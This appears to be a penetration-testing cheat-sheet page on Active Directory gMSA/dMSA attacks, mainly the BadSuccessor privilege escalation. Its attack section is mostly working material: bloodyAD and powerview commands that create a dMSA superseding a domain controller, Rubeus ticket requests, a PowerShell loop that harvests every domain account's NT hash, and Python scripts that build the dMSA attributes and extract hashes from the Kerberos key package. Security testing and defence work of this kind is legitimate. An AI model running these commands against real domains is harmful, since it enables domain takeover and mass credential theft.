# gMSA / dMSA

## Golden gMSA

* <https://www.semperis.com/blog/golden-gmsa-attack/>
* <https://github.com/Semperis/GoldenGMSA>

## BadSuccessor

* <https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory>
* <https://www.akamai.com/blog/security-research/badsuccessor-is-dead-analyzing-badsuccessor-patch>
* <https://medium.com/seercurity-spotlight/operationalizing-the-badsuccessor-abusing-dmsa-for-domain-privilege-escalation-429cefc36187>
* <https://sapirxfed.com/2025/05/24/the-new-dmsa-vuln-for-people-who-dont-know-what-dmsa-is/>
* <https://specterops.io/blog/2025/05/27/understanding-mitigating-badsuccessor/>
* <https://kreep.in/badsuccessor-abusing-dmsas-for-ad-domination/>

Enumerate OUs (and containers) on which we hold `CreateChild`, which is all that is needed to create a dMSA object there; `GenericAll`, `WriteDACL` or `WriteOwner` on an OU can be turned into `CreateChild` (using [powerview.py](https://github.com/aniqfakhrul/powerview.py) or [bloodyAD](https://github.com/CravateRouge/bloodyAD)):

```
PV > Get-DomainObjectAcl -LDAPFilter "(objectClass=organizationalUnit)" -Where "ActiveDirectoryRights contains CreateChild"
$ bloodyAD -d megacorp.local -k --host DC01.megacorp.local --dc-ip 192.168.1.11 --dns 192.168.1.11 [--gc 192.168.1.11] [-s] get writable --otype OU [--right CHILD]
```

Create a dMSA whose `msDS-ManagedAccountPrecededByLink` points at the account to supersede. Both tools also set `msDS-DelegatedMSAState` to `2` ("migration completed"), without which the KDC does not treat the link as a finished migration, and grant the attacker principal in `msDS-GroupMSAMembership` so it may request tickets for the dMSA (using [powerview.py](https://github.com/aniqfakhrul/powerview.py) or [bloodyAD](https://github.com/CravateRouge/bloodyAD)):

```
PV > Add-DomainDMSA -Identity mydmsa -PrincipalsAllowedToRetrieveManagedPassword jdoe -SupersededAccount DC01 [-BaseDN "CN=Managed Service Accounts,DC=megacorp,DC=local"]
$ bloodyAD -d megacorp.local -k --host DC01.megacorp.local --dc-ip 192.168.1.11 --dns 192.168.1.11 [--gc 192.168.1.11] [-s] add badSuccessor mydmsa -t "CN=DC01,OU=Domain Controllers,DC=megacorp,DC=local" [--ou "CN=Managed Service Accounts,DC=megacorp,DC=local"]
```
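What the two commands above write, spelled out as an added example (my code, not powerview.py, bloodyAD or the BadSuccessor research): it assembles the dMSA attribute set and builds the binary `msDS-GroupMSAMembership` security descriptor by hand, the part that usually breaks when people try a raw LDAP add. The link attribute and `msDS-DelegatedMSAState = 2` are what make it a BadSuccessor; the other attribute values mirror what `New-ADServiceAccount` writes and are assumptions here, as are the `0xF01FF` mask, the SID and the DNs, which are constructed for the example.

```python
import struct

ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000
MSA_MEMBERSHIP_MASK = 0xF01FF   # assumed: mask AD writes for -PrincipalsAllowedToRetrieveManagedPassword

def sid_to_bytes(sid):
    """'S-1-5-21-...' -> binary SID (revision, count, 48-bit BE authority, LE sub-authorities)."""
    parts = sid.split("-")
    if parts[0] != "S":
        raise ValueError("not a SID")
    subs = [int(p) for p in parts[3:]]
    return (bytes([int(parts[1]), len(subs)]) + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))

def bytes_to_sid(raw):
    """Inverse of sid_to_bytes, used to sanity-check the descriptor we produce."""
    count = raw[1]
    subs = struct.unpack_from("<%dI" % count, raw, 8)
    return "-".join(["S", str(raw[0]), str(int.from_bytes(raw[2:8], "big"))] + [str(s) for s in subs])

def build_msa_membership_sd(principal_sid, owner_sid="S-1-5-32-544"):
    """Self-relative SECURITY_DESCRIPTOR equal to SDDL O:<owner>D:(A;;0xf01ff;;;<principal>)."""
    sid, owner = sid_to_bytes(principal_sid), sid_to_bytes(owner_sid)
    # ACCESS_ALLOWED_ACE: type, flags, size, mask, SID
    ace = struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid), MSA_MEMBERSHIP_MASK) + sid
    # ACL header: AclRevision 4 (ACL_REVISION_DS), Sbz1, AclSize, AceCount, Sbz2
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(ace), 1, 0) + ace
    hdr_len = 20                                                # SECURITY_DESCRIPTOR_RELATIVE header size
    # Revision, Sbz1, Control, OffsetOwner, OffsetGroup, OffsetSacl, OffsetDacl
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         hdr_len, 0, 0, hdr_len + len(owner))
    return header + owner + acl

def parse_dacl(sd):
    """Walk a self-relative SD and return [(ace_type, mask, sid), ...] from its DACL."""
    control = struct.unpack_from("<H", sd, 2)[0]
    off_dacl = struct.unpack_from("<I", sd, 16)[0]
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    count = struct.unpack_from("<H", sd, off_dacl + 4)[0]
    pos, aces = off_dacl + 8, []
    for _ in range(count):
        ace_type, _flags, size = struct.unpack_from("<BBH", sd, pos)
        mask = struct.unpack_from("<I", sd, pos + 4)[0]
        aces.append((ace_type, mask, bytes_to_sid(sd[pos + 8:pos + size])))
        pos += size
    return aces

def badsuccessor_attributes(name, superseded_dn, principal_sid, dns_domain="megacorp.local"):
    """LDAP attributes for the dMSA. The link and state=2 are the BadSuccessor ingredients;
    the remaining values mirror New-ADServiceAccount defaults and are assumptions in this example."""
    return {
        "objectClass": "msDS-DelegatedManagedServiceAccount",
        "sAMAccountName": f"{name}$",
        "dNSHostName": f"{name}.{dns_domain}",
        "msDS-ManagedAccountPrecededByLink": superseded_dn,   # account whose PAC and keys we inherit
        "msDS-DelegatedMSAState": 2,                          # 2 = migration completed
        "msDS-GroupMSAMembership": build_msa_membership_sd(principal_sid),  # who may use the dMSA
        "msDS-ManagedPasswordInterval": 30,                   # assumed default
        "msDS-SupportedEncryptionTypes": 0x1C,                # assumed: RC4 + AES128 + AES256
        "userAccountControl": 0x1000,                         # assumed: WORKSTATION_TRUST_ACCOUNT
    }

if __name__ == "__main__":
    attrs = badsuccessor_attributes("mydmsa", "CN=DC01,OU=Domain Controllers,DC=megacorp,DC=local",
                                    "S-1-5-21-1234567890-987654321-111111111-1105")  # constructed SID
    print(parse_dacl(attrs["msDS-GroupMSAMembership"]))
    # With ldap3 the add is: conn.add("CN=mydmsa,OU=<writable OU>,DC=megacorp,DC=local",
    #     object_class=attrs["objectClass"],
    #     attributes={k: v for k, v in attrs.items() if k != "objectClass"})
```

`parse_dacl` is there so you can round-trip the descriptor before sending it; a malformed `msDS-GroupMSAMembership` is accepted by LDAP but silently leaves nobody able to request the dMSA's tickets.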

Using the TGT of a principal allowed to retrieve the dMSA's managed password (`jdoe` here), request a TGT for the dMSA: its PAC carries the superseded account's SID and group memberships, and the reply also contains the superseded account's keys in a `KERB-DMSA-KEY-PACKAGE` (using [Rubeus](https://github.com/GhostPack/Rubeus) or [minikerberos-getDmsa](https://github.com/skelsec/minikerberos/blob/main/minikerberos/examples/getDmsa.py)):

```
Cmd > Rubeus.exe asktgs /targetuser:mydmsa$ /service:krbtgt/megacorp.local /dmsa /opsec /nowrap /ticket:<JDOE_TGT>
$ python3 minikerberos/examples/getDmsa.py 'kerberos+ccache://megacorp.local\jdoe:tgt.ccache@192.168.1.11' 'mydmsa$@megacorp.local' --ccache /tmp/mydmsa.ccache
```

Loop over every domain user and computer, point `msDS-ManagedAccountPrecededByLink` at each one in turn, request the dMSA TGT and grep for the "previous keys" of the `KERB-DMSA-KEY-PACKAGE` structure: they are in fact the superseded account's current keys, so the `rc4_hmac` entry is its NT hash. This needs [this Rubeus fork](https://github.com/GhostPack/Rubeus/compare/master...YuG0rd:Rubeus:master), which prints the key package:

```powershell
# Base64 TGT of the principal allowed to retrieve the dMSA's managed password (jdoe here),
# e.g. from `Rubeus.exe asktgt /user:jdoe /password:<PASS> /nowrap`
$kirbi = "<JDOE_TGT>"
$domain = Get-ADDomain
$dmsa = "CN=mydmsa,CN=Managed Service Accounts,$($domain.DistinguishedName)"
# Every user and computer becomes, in turn, the "superseded" account
$allDNs = @(Get-ADUser -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName) `
        + @(Get-ADComputer -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName)
$allDNs | % {
    # Repoint the link, then request the dMSA TGT with the patched Rubeus (Invoke-Rubeus wrapper)
    Set-ADObject -Identity $dmsa -Replace @{ "msDS-ManagedAccountPrecededByLink" = $_.DN }
    $res = Invoke-Rubeus asktgs /targetuser:mydmsa$ /service:"krbtgt/$($domain.DNSRoot)" /opsec /dmsa /nowrap /ticket:$kirbi
    # "Previous Keys" of the KERB-DMSA-KEY-PACKAGE are the superseded account's current keys; rc4_hmac = NT hash
    $rc4 = [regex]::Match($res, 'Previous Keys for .*\$: \(rc4_hmac\) ([A-F0-9]{32})').Groups[1].Value
    "$($_.sAMAccountName):$rc4"
}
```
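To show what the loop above is actually grepping out of the Rubeus output, here is an added decoder for the `KERB-DMSA-KEY-PACKAGE` ASN.1 structure (my code, not Rubeus's, minikerberos's or the research's). The structure layout follows MS-KILE (`current-keys [0]`, `previous-keys [1] OPTIONAL`, `expiration-interval [2]`, `fetch-interval [3]`, each key an `EncryptionKey` of `keytype [0]`, `keyvalue [1]`). The DER walker is minimal and dependency-free; the package it decodes is constructed inline, not captured from a DC, and its "previous" `rc4_hmac` key is the NT hash of an empty password, chosen only as a recognisable placeholder.

```python
import datetime

# Kerberos etype numbers we expect in a dMSA key package
ETYPES = {17: "aes128_cts_hmac_sha1", 18: "aes256_cts_hmac_sha1", 23: "rc4_hmac"}

# --- minimal DER helpers (no pyasn1 dependency) -----------------------------

def _tlv(buf, pos=0):
    """Read one DER TLV at buf[pos]; return (tag, content, position after it)."""
    tag, ln = buf[pos], buf[pos + 1]
    pos += 2
    if ln & 0x80:                                   # long-form length
        n = ln & 0x7F
        ln = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + ln], pos + ln

def _children(buf):
    """Split a constructed value into its (tag, content) children."""
    out, pos = [], 0
    while pos < len(buf):
        tag, content, pos = _tlv(buf, pos)
        out.append((tag, content))
    return out

def _ctx(children, n):
    """Content of the EXPLICIT [n] child (tag 0xA0|n), or None if absent."""
    return next((c for t, c in children if t == (0xA0 | n)), None)

def _der(tag, content):
    """Encode one TLV (used only to build the constructed sample below)."""
    if len(content) < 0x80:
        return bytes([tag, len(content)]) + content
    lb = len(content).to_bytes((len(content).bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + content

# --- KERB-DMSA-KEY-PACKAGE (MS-KILE) ----------------------------------------
# KERB-DMSA-KEY-PACKAGE ::= SEQUENCE {
#     current-keys        [0] SEQUENCE OF EncryptionKey,
#     previous-keys       [1] SEQUENCE OF EncryptionKey OPTIONAL,
#     expiration-interval [2] KerberosTime,
#     fetch-interval      [3] KerberosTime }
# EncryptionKey ::= SEQUENCE { keytype [0] Int32, keyvalue [1] OCTET STRING }

def _enc_key(body):
    kids = _children(body)
    etype = int.from_bytes(_children(_ctx(kids, 0))[0][1], "big", signed=True)
    return etype, _children(_ctx(kids, 1))[0][1]

def _key_list(ctx):
    if ctx is None:                                 # previous-keys is OPTIONAL
        return []
    (_, seq), = _children(ctx)                      # the SEQUENCE OF inside the [n] wrapper
    return [_enc_key(body) for _, body in _children(seq)]

def _ktime(ctx):
    (_, gt), = _children(ctx)                       # KerberosTime is a GeneralizedTime
    return datetime.datetime.strptime(gt.decode(), "%Y%m%d%H%M%SZ")

def decode_dmsa_key_package(der):
    tag, body, _ = _tlv(der)
    if tag != 0x30:
        raise ValueError("KERB-DMSA-KEY-PACKAGE must be a SEQUENCE")
    kids = _children(body)
    return {"current_keys": _key_list(_ctx(kids, 0)),
            "previous_keys": _key_list(_ctx(kids, 1)),
            "expiration_interval": _ktime(_ctx(kids, 2)),
            "fetch_interval": _ktime(_ctx(kids, 3))}

def superseded_nt_hash(pkg):
    """BadSuccessor: previous-keys are the superseded account's current keys, so its rc4_hmac key is its NT hash."""
    return next((k.hex().upper() for e, k in pkg["previous_keys"] if e == 23), None)

def describe(pkg):
    """One line per key in the style the Rubeus fork prints, e.g. 'previous_keys: (rc4_hmac) <hex>'."""
    return [f"{label}: ({ETYPES.get(etype, etype)}) {key.hex().upper()}"
            for label in ("current_keys", "previous_keys") for etype, key in pkg[label]]

# --- constructed sample (NOT captured from a real DC) ------------------------
SAMPLE_DMSA_KEYS = [(18, bytes(range(32))), (23, bytes.fromhex("11" * 16))]
# The rc4 "previous" key is the NT hash of an empty password, used as a recognisable placeholder
SAMPLE_PREV_KEYS = [(18, bytes(range(32, 64))), (23, bytes.fromhex("31d6cfe0d16ae931b73c59d7e0c089c0"))]

def build_sample_package():
    def key(etype, k):
        return _der(0x30, _der(0xA0, _der(0x02, bytes([etype]))) + _der(0xA1, _der(0x04, k)))
    def keys(lst):
        return _der(0x30, b"".join(key(e, k) for e, k in lst))
    body = (_der(0xA0, keys(SAMPLE_DMSA_KEYS)) + _der(0xA1, keys(SAMPLE_PREV_KEYS))
            + _der(0xA2, _der(0x18, b"20250601120000Z")) + _der(0xA3, _der(0x18, b"20250524120000Z")))
    return _der(0x30, body)                         # > 127 bytes, so the long-form length path is exercised

if __name__ == "__main__":
    pkg = decode_dmsa_key_package(build_sample_package())
    print("\n".join(describe(pkg)))
    print("superseded account NT hash:", superseded_nt_hash(pkg))
```

Feed `decode_dmsa_key_package` the raw DER of the key package pulled out of a real TGS-REP and `superseded_nt_hash` returns exactly the value the regex in the loop above extracts; the AES entries in `previous_keys` are the superseded account's AES keys and work just as well for pass-the-key.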

### Tools

* <https://github.com/akamai/BadSuccessor>
* <https://github.com/logangoins/SharpSuccessor>
* <https://github.com/LuemmelSec/Pentest-Tools-Collection/blob/main/tools/ActiveDirectory/BadSuccessorCheck.ps1>
* <https://github.com/fulc2um/impacket/blob/badsuccessor/examples/badsuccessor.py>

## Golden dMSA

* <https://www.semperis.com/blog/golden-dmsa-what-is-dmsa-authentication-bypass/>
* <https://github.com/Semperis/GoldenDMSA>
